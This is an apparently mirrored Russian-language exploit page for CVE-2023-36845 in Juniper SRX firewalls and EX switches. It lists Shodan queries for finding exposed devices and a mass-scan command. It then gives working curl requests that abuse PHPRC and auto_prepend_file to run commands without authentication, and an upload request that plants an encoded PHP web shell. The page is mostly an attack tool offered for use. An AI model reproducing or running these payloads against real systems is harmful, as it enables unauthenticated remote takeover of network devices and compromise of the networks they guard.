## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KLJUNOWSKY-CVE-2023-36845
# CVE-2023-36845

## Описание
CVE-2023-36845 представляет собой известную уязвимость манипуляции переменными окружения PHP, которая затрагивает межсетевые экраны Juniper SRX и коммутаторы EX. Хотя Juniper классифицировал эту уязвимость как имеющую среднюю степень серьезности, в этой статье мы объясним, как эту единственную уязвимость можно использовать для удаленного выполнения кода без аутентификации.
## Поиск - Shodan
root@kitploit:~
title:"Juniper Web Device Manager"

root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739

## Использование 🛠
Обнаружение
root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt
## RCE 🧨
### Вариант 1
Использование любого обертки протокола в сочетании с `auto_prepend_file` возможно. Наиболее подходящим выбором для этой операции является протокол `data://`, который позволяет встроить "вторичный файл" непосредственно. Вот усовершенствованное представление этого эксплойта, выполняющего встроенный `<? phpinfo(); ?>` в схеме `data://`:
root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Выполнение команды `whoami`
`<?php shell_exec('whoami'); ?>`
root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
### Вариант 2
Загрузка файла
`<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>`
root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
## Параметры 🧰
Параметр| Описание| Тип
---|---|---
\--file / -f| Входной файл с целями| Файл
-o| Выходной файл| Файл
## Связаться со мной 📇
LinkedIn - Milan Jovic